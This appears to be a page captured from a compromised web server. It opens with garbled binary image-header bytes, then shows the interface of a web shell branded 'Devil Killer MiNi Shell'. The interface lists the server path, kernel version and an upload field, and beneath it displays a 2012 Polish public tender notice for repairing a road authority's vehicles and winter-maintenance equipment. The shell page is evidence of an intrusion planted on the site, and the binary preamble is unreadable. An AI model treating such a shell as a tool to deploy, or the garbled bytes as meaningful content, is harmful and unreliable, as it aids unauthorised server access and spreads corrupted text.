JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120206/29477-N-2012.html

<p class="kh_header"><b>Bydgoszcz: Usługi w zakresie naprawy i konserwacji pojazdów oraz podobnego do nich sprzętu - RDW Żołędowo w 2012 r. z podziałem na 4 części</b><br>
<b>Numer ogłoszenia: 29477 - 2012; data zamieszczenia: 06.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie naprawy i konserwacji pojazdów oraz podobnego do nich sprzętu - RDW Żołędowo w 2012 r. z podziałem na 4 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymagania szczegółowe związane z przedmiotem zamówienia dla:
2.1.  części nr 1 - usługi w zakresie naprawy i konserwacji pojazdów oraz podobnego do nich sprzętu:
1. 	obsługa techniczna OT - 1 (planowana ilość napraw ok. 12 razy),
2. 	obsługa techniczna OT - 2 + wymiana oleju (planowana ilość napraw ok. 12 razy) 
wg zakresu czynności instrukcji danego pojazdu lub sprzętu,
załącznik nr 3 do zarządzenia nr 7/91 Naczelnego Dyrektora ODP z dnia 6.05.1991 r. - dołączony do SIWZ,
3. 	naprawy bieżące (awaryjne) wynikające z eksploatacji pojazdów bądź podobnego 
	sprzętu (orientacyjna, planowana ilość r-g warsztatowych wynosi 140),

Pojazdy i sprzęt przewidziany do napraw warsztatowych:
1.	Polonez Caro+  o numerze rejestracyjnym BCS 3329,
2.	Citroen Jumper o numerze rejestracyjnym CBY 42M5,
3.	Skoda Fabia o numerze rejestracyjnym CBY JK88,
4.	Intrall Lublin 3 Mi o numerze rejestracyjnym CBY 39SH,
5.	Skoda Fabia o numerze rejestracyjnym CB 9654G,
6.	Przyczepa ciągnika o numerze rejestracyjnym CBY R152,
7.	Przyczepa samochodowa o numerze rejestracyjnym CBY R004,
8.	Rozdrabniarka do gałęzi Skorpion o numerze rejestracyjnym CBY R150,
9.    Ładowacz Cyklop,
10.  Ciągnik Farmtrac 70 o numerze rejestracyjnym CBY N509.
2.2. części nr 2 - usługi w zakresie naprawy, konserwacji i przeglądów sprzętu biorącego udział w Zimowym Utrzymaniu Dróg:

1. 	Wymagania szczegółowe związane z przedmiotem zamówienia:
2. 	Naprawy bieżące wraz z dojazdem wynikające z eksploatacji sprzętu wg ilości  i stawki r-g (orientacyjna, planowana ilość r-g warsztatowych wynosi 230), 
	3. 	Wykonanie przeglądów i napraw poprzeglądowych w siedzibie Zamawiającego,          
                 a wykonanie napraw (awarii) u Wykonawcy ZUD, bądź w warsztacie Wykonawcy -  
zgodnie ze złożonym protokołem przedwykonawczym. 
4. 	Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego, polecenia wykonania naprawy bądź konserwacji sprzętu do wykonania naprawy lub konserwacji w terminie nie dłuższym niż 3 dni robocze.
5.	Sprzęt biorący udział w Zimowym Utrzymaniu Dróg musi przejść przegląd w terminie 01.05.2012-01.10.2012 r. - planowana ilość - po 1 razie w roku.
Sprzęt przewidziany do przeglądu, konserwacji i naprawy:
1.	 Solarka SCHMIDT  ECOS - 1 szt.,
2.	 Solarka Stratos VCXN - 1 szt.,
3.	 Piaskarka P-1 - 3 szt.,
4.	 Pług PO- 64 - 2 szt.,
5.	 Pług OZW 32 - 4 szt.,
6.	 Pług wirnikowy PWF-2500 - 1 szt.,
7.	 Pług PO255 - 1szt.,
8.	 Pług SNK-27 - 1szt.

2.3. części nr 3 - usługi w zakresie naprawy i konserwacji  sprzętu 
- naprawa sprzętu wg ilości i stawki r-g (orientacyjna, planowana ilość r-g   warsztatowych wynosi 50), 

Sprzęt przewidziany do konserwacji i usuwania awarii:
     1.	 Kosy spalinowe FS 200 - 2 szt., FS 350 - 2 szt., FS 450 - 2 szt.,
      2.	 Kosiarka HORTMASZ - 1 szt.,
      3.	 Podkrzesywarka HT-75 - 3 szt.,
      4.	 Piły spalinowe MS 361 - 2 szt., MS 250 - 1 szt., MS 261 - 1 szt., MS 440 - 1 szt.,
      5.	 Zagęszczarka CF 1 - 1 szt.,
      6.	 Zagęszczarka VP 1340 R - 1 szt.,
      7.	 Agregat prądotwórczy F7001 - 1 szt.,
      8.	 Świder glebowy BT 360 - 1 szt.,
      9.	 Piła do cięcia asfaltu TS-400 - 1szt.,
      10.	 Dmuchawo-opryskiwacz SR-420 - 1 szt. 

2.4. części nr 4 - usługi w zakresie przeglądu, naprawy i konserwacji osprzętu 
       specjalistycznego do UNIMOGA
     1.  Przegląd sprzętu wg ilości i ceny jednostkowej przeglądu (orientacyjna, planowana ilość przeglądów - 1 raz w roku), 
2. 	Naprawy bieżące wraz z dojazdem wynikające z eksploatacji sprzętu wg ilości i stawki r-g (orientacyjna, planowana ilość r-g warsztatowych wynosi 45), 
	3. 	Wykonanie przeglądów i napraw poprzeglądowych w siedzibie Zamawiającego,          
                 bądź w warsztacie Wykonawcy - zgodnie ze złożonym protokołem    
                 przedwykonawczym. 
4. 	Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego, polecenia wykonania naprawy bądź konserwacji sprzętu do wykonania naprawy lub konserwacji w terminie nie dłuższym niż 3 dni robocze.

Sprzęt przewidziany do przeglądu, konserwacji i usuwania awarii:
1.	Wysięgnik FME 500
2.   Głowica Kosząca UMK 1200
3.   Wiertnica EBG
4.   Szczotka myjąca DWB
3.	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.
4. 	Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
5. 	Koszt użytych do napraw materiałów i części nie będzie obciążał ceny umownej.
6. 	Ceny materiałów nie mogą odbiegać od średnich notowań rynkowych. 
7. 	Wykonawca udzieli gwarancji na wykonane usługi min. 3 miesiące, a na nowo wbudowane części 12 miesięcy - dokonując oświadczenia w szczegółowej specyfikacji kosztów. 
8. 	Wykonawca dokona przeglądu, wymiany na wyłącznie fabrycznie nowe części zużytych (uszkodzonych) i oleju lub naprawy części zużytych (uszkodzonych), na podstawie szczegółowej specyfikacji kosztów, którą zatwierdzi Zamawiający, i dołączy ją do faktury.
9.   W przypadku awarii pojazdów Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego, polecenia wykonania naprawy pojazdów do odebrania z miejsca wskazanego przez Zamawiającego danego pojazdu w ciągu  24 godzin od momentu wydania polecenia, przetransportowania danego pojazdu do miejsca wykonania naprawy na własny koszt i ryzyko.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiajacy przewiduje udzielenie zamówien uzupełniajacych, o których mowa w art. 67 ust. 1 pkt 6
ustawy Pzp. Zamówienie uzupełniajace stanowic bedzie 20% wartosci zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, iż posiada ubezpieczenie od
odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem
niniejszego zamówienia, przy czym suma ubezpieczeniowa nie może być niższa niż 10.000,00 zł (dziesięć tysięcy złotych 00/100)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna zawierać: 1. Wypełniony i podpisany FORMULARZ OFERTY, 2.Oświadczenie Wykonawcy, że nie zalega z opłacaniem podatków i opłat; 3.Oświadczenie Wykonawcy, że nie zalega ze składkami na
ubezpieczenie zdrowotne lub społeczne; 
4. Wykaz części zamówienia, których wykonanie Wykonawca
powierzy podwykonawcom, z określeniem zakresu prac, które maja być wykonane przez podwykonawców.
5. Wypełniony kosztorys ofertowy.
6. Do oferty wspólnej winien być dołączony dokument wskazujący
pełnomocnika do reprezentowania wszystkich Wykonawców w postępowaniu. Pełnomocnictwo musi być podpisane przez pozostałych Wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której                  dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej                         z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
2.1.  	Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji usług. 

2.2.  	Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy;
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie                 i zaakceptowana pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy,           a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.

2.3. 	Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych             w treści umowy.
2.4. Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin realizacji zamówienia.

2.5.	Zmiany wynagrodzenia w przypadku:

       	a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);

3.	Zmiany uzasadnione okolicznościami, o których mowa wart. 357 1 k.c. - (Jeżeli                 z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone  z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy).

4. 	Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.zdw-bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Żołędowie, ul. Pałacowa 15, 86-031 Osielsko, pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 09:45, miejsce: Rejon Dróg Wojewódzkich w Żołędowie, ul. Pałacowa 15, 86-031 Osielsko,
sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi w zakresie naprawy i konserwacji pojazdów oraz podobnego do nich sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	obsługa techniczna OT - 1 (planowana ilość napraw ok. 12 razy),
2. 	obsługa techniczna OT - 2 + wymiana oleju (planowana ilość napraw ok. 12 razy) 
wg zakresu czynności instrukcji danego pojazdu lub sprzętu,
załącznik nr 3 do zarządzenia nr 7/91 Naczelnego Dyrektora ODP z dnia 6.05.1991 r. - dołączony do SIWZ,
3. 	naprawy bieżące (awaryjne) wynikające z eksploatacji pojazdów bądź podobnego 
	sprzętu (orientacyjna, planowana ilość r-g warsztatowych wynosi 140),

Pojazdy i sprzęt przewidziany do napraw warsztatowych:
1.	Polonez Caro+  o numerze rejestracyjnym BCS 3329,
2.	Citroen Jumper o numerze rejestracyjnym CBY 42M5,
3.	Skoda Fabia o numerze rejestracyjnym CBY JK88,
4.	Intrall Lublin 3 Mi o numerze rejestracyjnym CBY 39SH,
5.	Skoda Fabia o numerze rejestracyjnym CB 9654G,
6.	Przyczepa ciągnika o numerze rejestracyjnym CBY R152,
7.	Przyczepa samochodowa o numerze rejestracyjnym CBY R004,
8.	Rozdrabniarka do gałęzi Skorpion o numerze rejestracyjnym CBY R150,
9.    Ładowacz Cyklop,
10.  Ciągnik Farmtrac 70 o numerze rejestracyjnym CBY N509.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi w zakresie naprawy, konserwacji i przeglądów sprzętu biorącego udział w Zimowym Utrzymaniu Dróg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Wymagania szczegółowe związane z przedmiotem zamówienia:
2. 	Naprawy bieżące wraz z dojazdem wynikające z eksploatacji sprzętu wg ilości  i stawki r-g (orientacyjna, planowana ilość r-g warsztatowych wynosi 230), 
3. 	Wykonanie przeglądów i napraw poprzeglądowych w siedzibie Zamawiającego,          
                 a wykonanie napraw (awarii) u Wykonawcy ZUD, bądź w warsztacie Wykonawcy -  
zgodnie ze złożonym protokołem przedwykonawczym. 
4. 	Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego, polecenia wykonania naprawy bądź konserwacji sprzętu do wykonania naprawy lub konserwacji w terminie nie dłuższym niż 3 dni robocze.
5.	Sprzęt biorący udział w Zimowym Utrzymaniu Dróg musi przejść przegląd w terminie 01.05.2012-01.10.2012 r. - planowana ilość - po 1 razie w roku.
Sprzęt przewidziany do przeglądu, konserwacji i naprawy:
1.	 Solarka SCHMIDT  ECOS - 1 szt.,
2.	 Solarka Stratos VCXN - 1 szt.,
3.	 Piaskarka P-1 - 3 szt.,
4.	 Pług PO- 64 - 2 szt.,
5.	 Pług OZW 32 - 4 szt.,
6.	 Pług wirnikowy PWF-2500 - 1 szt.,
7.	 Pług PO255 - 1szt.,
8.	 Pług SNK-27 - 1szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi w zakresie naprawy i konserwacji  sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - naprawa sprzętu wg ilości i stawki r-g (orientacyjna, planowana ilość r-g   warsztatowych wynosi 50), 

Sprzęt przewidziany do konserwacji i usuwania awarii:
     1.	 Kosy spalinowe FS 200 - 2 szt., FS 350 - 2 szt., FS 450 - 2 szt.,
      2.	 Kosiarka HORTMASZ - 1 szt.,
      3.	 Podkrzesywarka HT-75 - 3 szt.,
      4.	 Piły spalinowe MS 361 - 2 szt., MS 250 - 1 szt., MS 261 - 1 szt., MS 440 - 1 szt.,
      5.	 Zagęszczarka CF 1 - 1 szt.,
      6.	 Zagęszczarka VP 1340 R - 1 szt.,
      7.	 Agregat prądotwórczy F7001 - 1 szt.,
      8.	 Świder glebowy BT 360 - 1 szt.,
      9.	 Piła do cięcia asfaltu TS-400 - 1szt.,
      10.	 Dmuchawo-opryskiwacz SR-420 - 1 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi w zakresie przeglądu, naprawy i konserwacji osprzętu specjalistycznego do UNIMOGA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Przegląd sprzętu wg ilości i ceny jednostkowej przeglądu (orientacyjna, planowana ilość przeglądów - 1 raz w roku), 
2. 	Naprawy bieżące wraz z dojazdem wynikające z eksploatacji sprzętu wg ilości i stawki r-g (orientacyjna, planowana ilość r-g warsztatowych wynosi 45), 
	3. 	Wykonanie przeglądów i napraw poprzeglądowych w siedzibie Zamawiającego,          
